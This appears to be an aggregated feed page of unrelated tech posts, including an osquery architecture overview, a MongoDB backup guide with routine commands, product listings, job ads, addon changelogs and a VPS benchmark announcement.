I started working on a modified version of Clementine already in 2013, but because of other priorities, I did not pick up the work again before last year. I had not decided then if I was creating a fork, or contributing to Clementine. I ended up doing both. I started to see that I wanted the program development in a different direction. My focus was to create a music player for playing local music files, and not having to maintain support for multiple internet features that I did not use, and some which I did not want in the program at all… I also saw more and more that I disagree with the authors of Clementine and some statements that have been made regarding high-resolution audio.



          Fixed Income Software Engineer      Cache   Translate Page   Web Page Cache   
NY-NEW YORK CITY, A prominent, data based global technology firm is currently seeking a Senior Software Engineer to join their team in New York. The firm's systems are very large and highly distributed, and engineers are always looking for creative solutions to solve problems, including employing a variety of modern programming languages, open source and big data technologies, as well as Machine Learning and Natura
          TuxMachines: Microsoft EEE and Openwashing      Cache   Translate Page   Web Page Cache   



          TuxMachines: New LibreOffice Version Offers Fresh Take      Cache   Translate Page   Web Page Cache   

Potential LibreOffice adopters should consider possible downsides, urged King. More than two decades into the "revolution" sparked by Linux and open source solutions, LibreOffice still constitutes a small fraction of the productivity applications and tools market.

Would that be the case if these offerings really were superior? Adopting any new platform requires retraining, and that includes LibreOffice, he said. Most employees arrive knowing at least the rudiments of Word and other Microsoft apps.

Plus, to its credit, Microsoft has addressed many user complaints and Office 365 makes it cheaper and easier to use the company's solutions than ever before, added King.

"So companies have to sort out why they are considering LibreOffice," he suggested, to determine "what potential benefits are actually achievable and whether leaving behind a longtime market leading solution (Office) really makes sense."



          WinJS 3 – Windows, Phone and now Web too      Cache   Translate Page   Web Page Cache   

Originally posted on: http://kariem.net/archive/2014/10/05/winjs-3--windows-phone-and-now-web-too.aspx

At Build 2014, Microsoft announced that WinJS was going open source and the first goal was to make it available to web sites, not just Windows and phone apps. On September 17th, the first official release of WinJS 3.0 was made available and brought with it cross browser compatibility. Setting it up to work on your site is no different than any other JavaScript library. But extending a Universal, Windows or Phone app to also include a web interface that includes WinJS is another thing entirely.

In this article I will demonstrate how to create a web app with WinJS 3 and then reuse that code in a Universal app. I will then show how you can extend the capabilities of your site to include native WinRT features without using Cordova to create a hybrid application.

Read the full article I have posted over on Code Project.


          Armchair CEO: Windows Phone      Cache   Translate Page   Web Page Cache   

Originally posted on: http://kariem.net/archive/2013/09/14/armchair-ceo-windows-phone.aspx

So the Nokia thing finally happened, assuming the EU allows it.  Now with Nokia under the Microsoft umbrella, what should they focus on next?

Lumia Accessories

When people love their phones, they want to buy more stuff for their phones.  This is one area the iPhone has everyone beat by far, even Samsung.  Microsoft should concentrate on more branded accessories by working with vendors and stock more of the existing third party ones in their stores.  Especially cases.  They need a super rugged case that is not huge and bulky, and a great looking waterproof case ASAP.

Free License

Stop charging what’s left of the device manufacturers a license for Windows Phone.  You’re in third place.  With the purchase of Nokia, this might not be salvageable.

Day One Updates

All carriers, all devices updated on the same day, just like Apple.  Microsoft ought to be able to at least get AT&T to agree to this and they certainly can make sure Nokia is ready to go.  These staggered rollouts have to stop.

Better XBOX Music, Video and Podcasts

Music has some issues with syncing and storage of your own music, but it's a great service.  Making it available on iOS and Android is a great idea.  Now make it perfect on Windows Phone.  Better playlists like Spotify would be good.  You're so close.

Video sucks.  Videos purchased on the XBOX marketplace should sync offline or stream to Windows Phone.  And LOWER the price of the videos.  A huge win here would be to bring the queues and search of Netflix, Hulu and other video services right into XBOX video on the phone.  Combine all your services into one app.  It doesn't need to play them, it just needs to launch the other apps.  This should be extensible to all third party apps.  Finally, get the missing major apps: Amazon Video, HBO GO, Showtime Anytime and somehow bring back YouTube.

Podcasts suck as much as video.  This is terrible.  There are so many things that need to be fixed here that it's a complete overhaul.  At a minimum show podcasts you still have to watch in their own queue.  Multiple playlists would be even better.  Back to the drawing board on this one.  Take some lessons from WPodder, my personal favorite of all the third party apps available on the platform.

Android Apps

Windows Phone has a LOT going for it over iOS and Android.  I am finally at the point where I try to get people to switch.  Average users who get this phone, love it.  The only complaint is the app market.  Most of the big apps are there or have third party alternatives.  What you don't see are new apps and small market apps until much later.  How many times have you seen a poster or ad with the "now available" on Apple App Store and Google Play logo without the Windows Store logo sitting right next to it.  The new Windows Phone App Studio could make a big difference for small apps, but not games.  Android is open source.  Build in integration into Windows Phone and make these apps available.  You can always try to push Windows Phone apps over the Android apps but this fills a huge gap real fast.  Want to stick it back to Google, build in the Amazon marketplace over Google Play.  So when I search for an app like Instagram it shows me the official app when it is available, otherwise it shows the Amazon app and finally if that's not available it shows the Google Play app.  And alert me when the official app is available if I am running an Android app or point me to great third party apps.

Windows RT Convergence

Finally, start the road to a single Phone / RT OS.  Someday the idea of the single device will be achievable for the average user.


          PinWorthy.com–Our New Windows Phone 7 Site      Cache   Translate Page   Web Page Cache   

Originally posted on: http://kariem.net/archive/2011/04/09/pinworthy.comndashour-new-windows-phone-7-site.aspx

Know your audience.  I’m guessing more than a few Geeks With Blogs readers are also proud owners of Windows Phone 7 devices.  If you want to know more detail about the blog content itself, head on over to our launch post.  But for this readership crowd I’ll focus more on the technical.

Pin Worthy

  • We built the site on BlogEngine.NET 2.0
  • It uses a custom designed theme based on the Metro UI.  Want it?  Just ask in the comment section!  We have not open sourced it yet but if you pinky swear to share changes you make and not distribute it to other people (just point them to this post, we’ll get them a copy) you can have it. 
  • It also has a mobile theme with a similar Metro feel.  (see below)
  • There is an actual app in the works.  These are crazy easy to make using tools like AppMakr and Follow My Feed.

Please check us out and let us know what you think.

We’re also looking for contributors.

Pin Worthy Mobile


          Jumper T8SG Plus multifunction remote control for RC models - 2.4G      Cache   Translate Page   Web Page Cache   
94,20€ - Banggood
After looking for a while for a deal on a Taranis for a drone build project, I looked into compatible models and found this Jumper, which has good reviews.
It is compact, multi-protocol, with Hall effect sticks and a very readable OLED screen, and it runs DeviationTX.

A few reviews:
https://www.helicomicro.com/2018/05/03/jumper-t8sg-v2-0-plus-le-test/
https://rotorbuilds.com/review/11221

A video review:
[shortcode id="9875073"/]


BangGood listing:

Description:
Brand: Jumper
Item number: T8SG V2.0 Plus
Size: 158 x 150 x 58mm
Weight: 338g (without battery)
Transmission frequency: 2.400GHz-2.7GHz
Transmitter module: four-in-one high frequency module (CC2500 CYRF6936 A7105 NRF2401)
Transmit power: maximum 22dBm (adjustable transmit power)
Antenna gain: 2dB (detachable antenna, easy to modify)
Working current: 88mA@8.4V
Operating voltage: DC4.5-DC18V (ships with a 4 x AA battery box; a 2s lithium battery with balance lead is recommended; batteries not included)
Remote control range: > 2km @ 22dBm
Open source firmware:
Number of channels: up to 12 channels (depending on the receiver)
Display: 2.42 inch OLED screen, 128 * 64 resolution
Gimbal type: contactless 3D space vector Hall joystick
JR / FrSKY compatible module bay on the back
Upgrade method: USB online upgrade
Supported protocols:
* Walkera full range
* DSM2 / X full range
* Flysky and Flysky 2A
* FrSKY
* FUTABA S-FHSS full range
* WL Toys series, Hubsan series, Esky series and many more (currently more than 40 protocols supported in total)
Uses open source software with continuous support and development, with new protocols added regularly.
Simulator mode: standard 3.5mm PPM output
USB output.

Features:
* Built-in four-in-one RF module (CC2500 CYRF6936 A7105 NRF2401).
* Open source multi-protocol firmware, compatible with most mainstream radios
* Contactless 3D space vector Hall sensor gimbals (T8SG Plus only).
* T8SG Plus 2.42 inch OLED screen; the bright display works even in full sunlight.
* JR / FrSKY compatible module bay on the back.
* USB online firmware update.
* Adjustable transmit power to suit different regional requirements.
* Detachable antenna, easy to change.
* Ultra-low power consumption, longer battery life.
* Up to 12 output channels (depending on the receiver), open source firmware, all channels fully programmable.
* Wide voltage input (2s LiPo recommended).
* Multilingual menu.
* Vibration reminder function.
* Telemetry support (depending on the receiver).
* Carrying case included.

T8SG Plus improvements:
1.) All-new tooling design gives a unique look and an ergonomic feel.
2.) Two additional top switches added.
3.) Improved switch quality on all switches for better reliability and a quality feel.
4.) All-new HALL SENSOR gimbal design gives finer precision and crisp response.
5.) JR module bay added for third-party RF modules
6.) Front dials changed to side scroll wheels for better usability.
7.) External USB port for convenience.
8.) 2.7 in backlit OLED screen
9.) Added AA battery box for easy battery installation (2s LiPo optional)
10.) Improved power switch with two LED status indicators.
11.) Improved shipping box, high strength with a premium look.
12.) Quick start guide included.
          RESPONSABILE UFFICIO PREVENTIVI - OSM open source management - Mapello, Lombardia      Cache   Translate Page   Web Page Cache   
A fixed-term contract with a real opportunity to turn it into a permanent one, possibilities for growth and for developing your own professional skills,...
From Indeed - Fri, 20 Jul 2018 12:02:05 GMT - View all Mapello, Lombardia jobs
          Delivering Real Time Analytics with Sitecore and DataStax      Cache   Translate Page   Web Page Cache   

In one of my earlier articles, I talked about why your company or organization should adopt Sitecore as your Experience Platform. It's a good platform for users, content authors, and developers to create compelling and engaging digital experiences as well as collect information on website traffic. Machine learning and analytics in personalized content are two of the most compelling features of Sitecore. In today's world, companies, particularly the Fortune 500, require real-time analytics to help drive stakeholder goals.

It’s Tradition

Traditionally, Sitecore used MongoDB as its experience database (xDB) of choice for storing and retrieving analytics. However, with the latest version of Sitecore, the company is offering more options for development teams to fit their needs, especially if they require real-time analytics. There are now options for using SQL Server's new provider for NoSQL data. In fact, at the time of writing, the only option for Sitecore 9 xDB deployment is the SQL Server provider. The company has planned support for MongoDB but sent a clear message with its change of xDB choice in the latest version. The platform is also looking at expanding to higher-end distributed NoSQL databases such as Microsoft Azure CosmosDB. This would require an Azure subscription but would offer features to support distributed analytics.

Why DataStax?

DataStax Enterprise (DSE) is an always-on, distributed cloud database built on Apache Cassandra and designed for the hybrid cloud. Our firm is making the argument that Apache Cassandra, and more importantly DataStax, should be used as your analytics xDB option if you are building experiences for the Right-Now Economy. These are usually systems which use IoT (internet of things) or have global demand from a user audience of hundreds of millions and thus can never fail. That goes double for the analytical operations you run on the real-time data you are storing.

DataStax over the Competition

Cassandra and DataStax clearly outperform MongoDB and other rivals in Throughput by Workload and Load Process benchmarks. They also provide no single point of failure and more consistency models to support high-level operations. Cassandra is completely free and open source and supports both cloud and on-premise deployment (translation: you won't need an Azure subscription as you would with CosmosDB), but the real special sauce is with DataStax. DataStax is a commercial product; however, it is almost always used if Cassandra is being deployed at enterprise scale. DSE integrates Cassandra with graph, search, analytics, administration, developer tooling, and monitoring all in one platform. With Mongo or other NoSQL competitors, developers would have to piece together these functionalities with third-party options instead of native out of the box support. Developers can also create Spark jobs and see analytical data or personalize content in real time no matter how many users are viewing the experience. Other systems support Spark; however, they are usually deployed in a master-to-slave or parent-to-child relationship, providing points of failure for both your users and your analytical operations. Furthermore, they tend to face challenges when an application needs to be global.

Our Business Platform Services

Need help with a Business Platform implementation or guidance in creating a tailor-fit design & architecture? Our team has decades of Business Platform experience and can help you transition onto the next phase of your technology eco-system, whether it be using Sitecore and DataStax, or simply a combination of common SaaS software like WordPress and Salesforce. Don't know where to start? Check out our services or send us a quick email!

Resources

- DataStax Corporate
- DSE vs MongoDB

Photo by Carlos Muza on Unsplash


          Osquery: Under the Hood      Cache   Translate Page   Web Page Cache   

Four years, 243 contributors, and 4,573 commits (and counting!) have gone into the development of osquery. It is a complex project, with performance and reliability guarantees that have enabled its deployment on millions of hosts across a variety of top companies. Want to learn more about the architecture of the system?

This look under the hood is intended for users who want to step up their osquery game, developers interested in contributing to osquery, or anyone who would like to learn from the architecture of a successful open source project.

For those new to osquery, it may be useful to start with Monitoring macOS hosts with osquery, which provides an introduction to how the project is actually used.


Data flows within osquery

Query Engine

The promise of osquery is to serve up instrumentation data in a consistent fashion, enabling ordinary users to perform sophisticated analysis with a familiar SQL dialect. Osquery doesn’t just use SQLite syntax, the query engine is SQLite. Osquery gets all of the query parsing, optimization and execution functionality from SQLite, enabling the project to focus on finding the most relevant sources for instrumentation data.

Osquery doesn’t just use SQLite syntax, the query engine is SQLite.

It’s important to mention that, while osquery uses the SQLite query engine, it does not actually use SQLite for data storage. Most data is generated on-the-fly at query execution time through a concept we call “Virtual Tables”. Osquery does need to store some data on the host, and for this it uses an embedded RocksDB database (discussed later).


A complex osquery query: Find root processes with socket connections open to non-local hosts.

Virtual Tables

Virtual Tables are the meat of osquery. They gather all the data that we serve up for analytics. Most virtual tables generate their data at query time ― by parsing a file or calling a system API.

Tables are defined via a DSL implemented in Python. The osquery build system will read the table definition files, utilizing the directory hierarchy to determine which platforms they support, and then hook up all the plumbing for SQLite to dynamically retrieve data from the table.

At query time, the SQLite query engine will request the virtual table to generate data. The osquery code translates the SQLite table constraints in a fashion that the virtual table implementation can use to optimize (or entirely determine) which APIs/files it accesses to generate the data.

For example, take a simple virtual table like etc_hosts. This simply parses the /etc/hosts file and outputs each entry as a separate row. There's little need for the virtual table implementation to receive the query parameters, as it will read the entire file in any case. After the virtual table generates the data, the SQLite engine performs any filtering provided in the WHERE clause.

A table like users can take advantage of the query context. The users table will check if uid or username are specified in the constraints, and use that to only load the metadata for the relevant users rather than doing a full enumeration of users. It would be fine for this table to ignore the constraints and simply allow SQLite to do the filtering, but we gain a slight performance advantage by only generating the requested data. In other instances, this performance difference could be much more extreme.

A final type of table must look at the query constraints to do any work at all. Take the hash table which calculates hashes of the referenced files. Without any constraint this table will not know what files to operate on (because it would be disastrous to try to hash every file on the system), and so will return no results.
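
To make the constraint behaviour concrete, here are a few illustrative queries against the tables just discussed (the literal values are arbitrary):

-- etc_hosts ignores constraints; SQLite filters the full result set:
SELECT * FROM etc_hosts WHERE address = '127.0.0.1';

-- users pushes the constraint down and only generates metadata for uid 0:
SELECT uid, username FROM users WHERE uid = 0;

-- hash does no work without a constraint; the path tells it what to hash:
SELECT path, sha256 FROM hash WHERE path = '/etc/hosts';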

The osquery developers have put a great deal of effort into making virtual table creation easy for community contributors. Create a simple spec file (using a custom DSL built in Python) and implement in C++ (or C/Objective-C as necessary). The build system will automatically hook things up so that the new table has full interoperability with all of the existing tables in the osquery ecosystem.

Schema file for etc_hosts table
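
As a rough sketch of what such a spec looks like in that Python DSL (the column descriptions here are approximate):

table_name("etc_hosts")
description("Line-parsed /etc/hosts.")
schema([
    Column("address", TEXT, "IP address mapping"),
    Column("hostnames", TEXT, "Raw hosts mapping"),
])
implementation("etc_hosts@genEtcHosts")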

Event System

Not all of the data exposed by osquery fits well into the model of generating on-the-fly when the table is queried. Take for example the common problem of file integrity monitoring (FIM). If we schedule a query to run every 5 minutes to capture the hash of important files on the system, we might miss an interval where an attacker changed that file and then reverted the change before our next scan. We need continuous visibility.

To solve problems like this, osquery has an event publisher/subscriber system that can generate, filter and store data to be exposed when the appropriate virtual table is queried. Event publishers run in their own thread and can use whatever APIs they need to create a stream of events to publish. For FIM on Linux, the publisher generates events through inotify. It then publishes the events to one or more subscribers, which can filter and store the data (in RocksDB) as they see fit. Finally, when a user queries an event-based table, the relevant data is pulled from the store and run through the same SQLite filtering system as any other table results.
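
Once a FIM publisher and subscriber are configured, the buffered events surface through an ordinary query against the corresponding event-based table, for example:

SELECT target_path, action, time FROM file_events;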

Scheduler

Some very careful design considerations went into the osquery scheduler. Consider deploying osquery on a massive scale, like the over 1 million production hosts in Facebook’s fleet. It could be a huge problem if each of these hosts ran the same query at the exact same time and caused a simultaneous spike in resource usage. So the scheduler provides a randomized “splay”, allowing queries to run on an approximate rather than exact interval. This simple design prevents resource spikes across the fleet.

It is also important to note that the scheduler doesn’t operate on clock time, but rather ticks from the running osquery process. On a server (that is never in sleep mode), this will effectively be clock time. On a laptop (often sleeping when the user closes the lid), osquery will only tick while the computer is active, and therefore scheduler time will not correspond well with clock time.

Diff Engine

In order to optimize for large scale and bubble up the most relevant data, osquery provides facilities for outputting differential query results. Each time a query runs, the results of that query are stored in the internal RocksDB store. When logs are output, the results of the current query are compared with the results of the existing query, and a log of the added/removed rows can be provided.

This is optional, and queries can be run in “snapshot” mode, in which the results are not stored and the entire set of query results are output on each scheduled run of the query.
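
For illustration, a scheduled-query configuration of the usual shape, pairing a differential query with a snapshot one (the query names and intervals here are arbitrary):

{
  "schedule": {
    "root_shell_history": {
      "query": "SELECT * FROM shell_history WHERE uid = 0;",
      "interval": 300
    },
    "all_users_snapshot": {
      "query": "SELECT uid, username FROM users;",
      "interval": 3600,
      "snapshot": true
    }
  }
}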

RocksDB

Though much of the data that osquery presents is dynamically generated by the system state at query time, there are a myriad of contexts in which the agent stores data. For example, the events system needs a backing store to buffer events into between intervals of the queries running.

To achieve this, osquery utilizes another Facebook open source project, RocksDB, as its embedded storage engine.
          A Review of MongoDB Backup Options      Cache   Translate Page   Web Page Cache   

A database backup is a way to protect and restore data. It is the process of storing the operational state, architecture, and data of your database. It can be very useful in situations of technical outage or disaster, so it is essential to keep backups of your database and to make sure your database has a good and easy backup process.

MongoDB provides several tools/techniques to back up your databases easily.

In this article, we will discuss some of the top MongoDB backup and restore workflows.

Generally, there are three common options to back up your MongoDB server/cluster.

- Mongodump/Mongorestore
- MongoDB Cloud Manager
- Database Snapshots

Apart from these general options, there are other ways to back up your MongoDB. We will discuss all these options in this article as well. Let’s get started.

MongoDump/MongoRestore

If you have a small database (<100GB) and you want to have full control of your backups, then Mongodump and Mongorestore are your best options. These are command-line utilities which can be used to manually back up your database or collections. Mongodump dumps all the data in Binary JSON (BSON) format to the specified location. Mongorestore can use these BSON files to restore your database.

Backup a Whole Database $ sudo mongodump --db mydb --out /var/backups/mongo

Output:

2018-08-20T10:11:57.685-0500    writing mydb.users to /var/backups/mongo/mydb/users.bson
2018-08-20T10:11:57.907-0500    writing mydb.users metadata to /var/backups/mongo/mydb/users.metadata.json
2018-08-20T10:11:57.911-0500    done dumping mydb.users (25000 documents)
2018-08-20T10:11:57.911-0500    writing mydb.system.indexes to /var/backups/mongo/mydb/system.indexes.bson

In this command, the most important argument is --db. It specifies the name of the database that you want to back up. If you don’t specify this argument, the Mongodump command will back up all your databases, which can be a very resource-intensive process.

Backup a Single Collection $ mongodump -d mydb -o /var/backups/mongo --collection users

This command will back up only the users collection in the mydb database. If you don’t give this option, it will back up all the collections in the database by default.

Taking Regular Backups Using Mongodump/Mongorestore

As a standard practice, you should be making regular backups of your MongoDB database. Suppose you want to take a backup every day at 3:03 AM; on a Linux system you can do this by adding a cron entry in crontab.

$ sudo crontab -e

Add this line in crontab:

3 3 * * * mongodump --out /var/backups/mongo Restore a Whole Database

For restoring the database, we can use the Mongorestore command with the --db option. It will read the BSON files created by Mongodump and restore your database.

$ sudo mongorestore --db mydb /var/backups/mongo/mydb

Output

2018-07-20T12:44:30.876-0500    building a list of collections to restore from /var/backups/mongo/mydb/ dir
2018-07-20T12:44:30.908-0500    reading metadata file from /var/backups/mongo/mydb/users.metadata.json
2018-07-20T12:44:30.909-0500    restoring mydb.users from file /var/backups/mongo/mydb/users.bson
2018-07-20T12:45:01.591-0500    restoring indexes for collection mydb.users from metadata
2018-07-20T12:45:01.592-0500    finished restoring mydb.users (25000 documents)
2018-07-20T12:45:01.592-0500    done

Restore a whole collection

To restore just a single collection from the database, you can use the following command:

$ mongorestore -d mydb -c users mydb/users.bson

If your collection is backed up in JSON format instead of BSON then you can use the following command:

$ mongoimport --db mydb --collection users --file users.json --jsonArray

Advantages

- Very simple to use
- You have full access to your backup
- You can put your backups at any location like NFS shares, AWS S3 etc.

Disadvantages

- Every time it will take a full backup of the database, not just the difference.
- For large databases, it can take hours to backup and restore the database.
- It’s not point-in-time by default, which means that if your data changes while backing it up then your backup may result in inconsistency. You can use --oplog option to resolve this problem. It will take a snapshot of the database at the end of mongodump process.

MongoDB Ops Manager

Ops Manager is a management application for MongoDB which runs in your data center. It continuously backs up your data and provides point-in-time restore processes for your database. Within this application, there is an agent which connects to your MongoDB instances. It will first perform an initial sync to backup the current state of the database. The agent will keep sending the compressed and encrypted oplog data to Ops Manager so that you can have a continuous backup. Using this data, Ops Manager will create database snapshots. It will create a snapshot of your database every 6 hours and oplog data will be stored for 24 hours. You can configure the snapshot schedule anytime using the Ops Manager.

Advantages

- It’s point-in-time by default
- Doesn’t impact the production performance except for initial sync
- Support for consistent snapshots of sharded clusters
- Flexibility to exclude non-critical collections

Disadvantages

- Network latency increases with the snapshot size while restoring the database.

MongoDB Cloud Manager

MongoDB Cloud Manager is a cloud-based backup solution which provides point-in-time restore and continuous online backup as a fully managed service. You can simply install the Cloud Manager agent to manage backup and restore of your database. It will store your backup data in the MongoDB cloud.

Advantages

Very simple to use. Good GUI.
Continuous backup of queries and oplog.

Disadvantages

No control over the backup data. It is stored in the MongoDB cloud.
Cost depends on the size of the data and the amount of oplog changes.
Restore process is slow.

Snapshot Database Files

This is the simplest solution to back up your database. You can copy all the underlying files (the contents of the data/ directory) and place them in any secure location. Before copying the files, you should stop all ongoing write operations to the database to ensure data consistency. You can use the db.fsyncLock() command to stop all write operations.
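A rough sketch of that lock-copy-unlock sequence (assuming the default data path /var/lib/mongodb; both paths are examples, so adjust them for your setup):

$ mongo --eval "db.fsyncLock()"
$ sudo cp -a /var/lib/mongodb /var/backups/mongo-files
$ mongo --eval "db.fsyncUnlock()"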

There are two types of snapshots: cloud-level snapshots and OS-level snapshots.

If you are storing database data with a cloud service provider like AWS, you would take AWS EBS snapshots for backup. In contrast, if you are storing DB files on a native OS like Linux, you would take LVM snapshots. LVM snapshots are not portable to other machines, so cloud-based snapshots are better than OS-based snapshots.

Advantages

Easy to use. Full control over snapshots. You can move them to any data center.
These snapshots are diff snapshots which store only the differences from previous snapshots.
No need to download the snapshots for restoring your database. You can just create a new volume from your snapshot.

Disadvantages

Using this method, you can only restore your database at backup points.
Maintenance sometimes becomes very complex.
To coordinate backups across all the replica sets (in a sharded system), you need a dedicated devops team.


MongoDB Consistent Backup tool

MongoDB Consistent Backup is a tool for performing consistent backups of MongoDB clusters. It can back up a cluster with one or many shards to a single point in time. It uses mongodump as the default backup method. Run the following command to take a backup using this tool.

$ mongodb-consistent-backup -H localhost -P 27017 -u USERNAME -p PASSWORD -l /var/backups/mongo

All the backups generated by this command are mongorestore-compatible. You can use the mongorestore command with the --oplogReplay option to ensure consistency.

$ mongorestore --host localhost --port 27017 -u USERNAME -p PASSWORD --oplogReplay --dir /var/backups/mongo/mydb/dump

Advantages

Fully open source
Works with sharded clusters
Provides an option for remote backup, such as Amazon S3
Auto-scaling available
Very easy to install and run

Disadvantages

Not a fully mature product
Very few remote upload options
Doesn't support data encryption before saving to disk
Official code repository lacks proper testing

ClusterControl Backup

ClusterControl is an all-in-one automated database management system. It lets you monitor, deploy, manage and scale your database clusters with ease. It supports MySQL, MongoDB, PostgreSQL, Percona XtraDB and Galera Cluster. This software automates almost all database operations, such as deploying a cluster, adding or removing a node from a cluster, continuous backups, and scaling the cluster. All of this can be done from the single GUI provided by ClusterControl.

ClusterControl provides a very nice GUI for MongoDB backup management, with support for scheduling and report creation. It gives you two options for backup methods:

Mongodump
MongoDB Consistent Backup

So users can choose either option according to their needs. The tool assigns a unique ID to each backup and stores it under this path: ClusterControl > Settings > Backup > BackupID. If the specified node is not live while taking the backup, the tool will automatically find a live node in the cluster and carry on the backup process on that node. It also provides an option for scheduling backups using either of the above backup methods. You can enable or disable any scheduled job by just toggling a button. ClusterControl runs the backup process in the background, so it won't affect the other jobs in the queue.

Advantages

Easy installation and very simple to use
Multiple options for backup methods
Backup scheduling is very easy using a simple GUI form
Automated backup verification
Backup reports with status

Disadvantages

Both backup methods internally use mongodump, which has some issues with handling very large databases.

Conclusion

A good backup strategy is a critical part of any database management system. MongoDB offers many options for backup and recovery/restore. Along with a good backup method, it is very important to have multiple replicas of the database. This helps restore the database without even one second of downtime. Sometimes, for larger databases, the backup process can be very resource-intensive, so the server should be equipped with a good CPU, enough RAM, and ample disk space to handle this kind of load. Because the backup process can increase the load on the server, you should run it during the night or at non-peak hours.


          Fast Track to Optimize Your Enterprise Data Warehouse

An Enterprise Data Warehouse (EDW) is traditionally used for generating reports and answering pre-defined queries, where workloads and service-level requirements are static. The drawback is that these platforms impose rigidity, because the schemas must be modeled in advance for the queries that are anticipated. Constrained by this limitation, users cannot freely explore and ask questions of their data to enable the timely responses and insights that drive the speed of business required to stay competitive today.

“Warehouse by the Lake” Complementary Approach

Supplementing the EDW with Apache Hadoop not only contains the growing costs of running enterprise data warehouses, but also gives users flexibility and reusability in how data is consumed, thanks to the introduction of schema-on-read. When Hadoop is used to optimize the EDW, organizations can get the best of both worlds: the EDW for standard operational queries, and Hadoop for exploratory analytics and workload shift.

Hadoop provides a versatile and extensible analytic platform that uses commodity hardware and open source innovation to deliver economies of scale. Enterprise Data Warehouse (EDW) optimization, where data- and compute-intensive processes are offloaded from the EDW to Hadoop, has proven to be one of the most popular use cases for the open source platform. EDW optimization is often one of the first use cases for Hadoop because it can readily deliver tangible results, thanks to:

Cost savings delivered by commodity infrastructure and open source software.
Proven capability to perform at scale.
Innovations that have brought interactive BI to Hadoop.
Productivity gains attributable to more efficient data enrichment and correlation.

However, the flip side is that making the proper configurations can be time-consuming because of the lack of expertise in integrating Hadoop into existing environments.

Introducing a Prescriptive Solution

The Hortonworks solution for EDW optimization addresses the need for an ideal configuration while capitalizing on Hadoop's versatility. The solution enables customers unfamiliar with Hadoop to gain immediate proof of value from EDW optimization through a guided, fixed-term, fixed-scope engagement, delivering a full Hadoop platform that will grow with customer needs.

Beyond that, the one-month jumpstart engagement, which bundles services, software, and integrations, offers a prescriptive best-of-breed solution that includes:

Hortonworks Data Platform (HDP) as the open source Apache Hadoop distribution,
Syncsort DMX-h for data integration,
Jethro Data as the high-performance analytic engine, and
Hortonworks Professional Services as the center of excellence ensuring the implementation is on time and on target.

The solution guides customers through a “recipe” that generates production-ready online analytical processing (OLAP) cubes to which they can connect their designated BI tools. This encompasses rehosting data and ETL processes from the data warehousing environment onto the Hortonworks Data Platform (HDP), helping customers configure Hadoop and installing partner tooling for data integration and OLAP.

To learn more about the Hortonworks solution that can help you right-size your EDW in a time-efficient manner for accelerated time-to-value, please read the white paper below:

Using Hadoop to Optimize the Enterprise Data Warehouse


          The Indian Express Script | Firstpost Script
Our India Times clone is developed mainly for people who want to take their news-portal business online. It provides a brand-new, professional news-portal script with advanced features and functionality, making the latest trends easily accessible to users. The script will also help new entrepreneurs who would like to run an online business and provide a trusted, up-to-date news service on a reliable and robust platform. This India Times script makes it much easier for users to access the site without any technical knowledge, because it is built to be user-friendly. The Indian Express Script is designed on an open source PHP platform to make it as efficient as possible for the user. The script can be customized as global or local to reach a worldwide audience, and a new user can simply register an account with a valid email address and password for authentication.
          SexyMap (v8.0.5)
Change Log:
--------------------
SexyMap
v8.0.5 (2018-08-10)
Full Changelog Previous releases

Buttons: Correctly parent the zone text.
Buttons: Fix not being able to hide the dungeon status indicators.
ZoneText: Fix zone text not hiding.
Coordinates: Make sure the text doesn't expand beyond the border.
Buttons: Tweak the button fading code.
Use LibDBIcon as a feed for new addon buttons. This completely drops support for custom made addon buttons. SexyMap will no longer maintain an arbitrary list of these. Ask authors to use LibDBIcon to build their minimap icons.


Description:
--------------------
https://cdn-wow.mmoui.com/preview/pvw68420.png
Please support my work on Patreon!

SexyMap is open source and development is done on GitHub. You can contribute code, localization, and report issues there: https://github.com/funkydude/SexyMap

Make your minimap ubersexah! SexyMap is a minimap awesomification mod, supporting:

Minimap moving, and movement of things like the quest tracker and durability frame.
Customization of zone text & clock
Hiding of all buttons attached to the minimap (can be set to be always hidden, or to show on minimap hover)
Sexy minimap border options, extremely configurable, with several slammin' presets.
Ping notification
Mousewheel minimap zoom, and auto zoom-out.
A HUD overlay for resource gathering, target tracking, and more.
          Capping (v8.0.11)
Change Log:
--------------------
Capping
v8.0.11 (2018-08-10)
Full Changelog Previous releases

Another attempt to fix the issue where the queue ready timer would persist after zoning into the bg.
More score predictor improvements.
Change bar icon for score bar.


Description:
--------------------
https://cdn-wow.mmoui.com/preview/pvw68420.png
Please support my work on Patreon!

Battleground timers and other PvP features.

Configure by right-clicking the anchor or by typing /capping

Features

All battlegrounds/arenas have queue timers
Arenas - Shadow Sight timer, arena time remaining
Alterac Valley - Node timers, auto quest turnins
Arathi Basin - Node timers and final score estimation
Eye of the Storm - Flag respawn timer, final score estimation
Isle of Conquest - Node timers and siege engine timer
Warsong Gulch - Flag respawn timer
Wintergrasp - Wall attack alerts
Battle for Gilneas - Node timers and final score estimation
Deepwind Gorge - Node timers and final score estimation


Capping is open source and development is done on GitHub. You can contribute code, localization, and report issues there: https://github.com/BigWigsMods/Capping
          New VPS specific benchmark [Update: Download avail.]

Hello all

I have had enough of what I felt was a quite unsatisfactory situation with regard to benchmarks. One of my major worries, which seemed not to be addressed by any widely available server benchmark, is the fact that VPSs are somewhat special and "sensitive animals", because there are other users on a node and because providers and neighbours are (understandably) easily angered by a VPS all but blocking a node during benchmarking.

vpsbench changes that. Using a microsecond-based timer, it can afford to break up the benchmark tests into many small slices with small pauses in between, so that a node is never blocked by it.

Another gripe I had was that connectivity benchmarks virtually always include host resolution and server setup on the other side. As that can take quite a large amount of time, the results are somewhere between cooked and questionable. vpsbench doesn't do that; it starts measuring only once the session is set up and data begins to flow, so it shows the real throughput.

Probably only rarely useful, it also shows the "build up", which can be helpful both to get an impression of congestion and especially to save bandwidth. I have done a lot of testing and found that virtually all connections are within 1% or 2% of their top speed after 32-64 MB. vpsbench has a default of 64 MB but allows any size between about 10 MB and about 2 GB, depending on the target file size of course. This feature also allows you to test against a 1 GB file while transferring only 64 MB, or whatever size you chose.

Oh, and you can have different "target sets": say, a mainly-Europe one, a west coast one, a small and fast one, etc. Moreover, you can run all the tests (in a very simple way, see below) or you can choose which ones to run.

Another point I often missed was useful and relevant info on a VPS: things like how many cores, how much real memory, the model and family of the CPU, flags (useful to identify "hidden" vCores), etc. Well, vpsbench provides all that.

Regarding disks, vpsbench does the usual sequential read/write and the somewhat less common random read/write, and I do mean "random" (evil grin). If vpsbench shows good random read/write results, you can bet that your database will fly.

My final issue was that I'm not interested in integer or floating point performance but in areas that are important for a server moving lots of data around: string operations and, increasingly, crypto. So that's what vpsbench measures, and it looks at both single-core and multi-core performance.

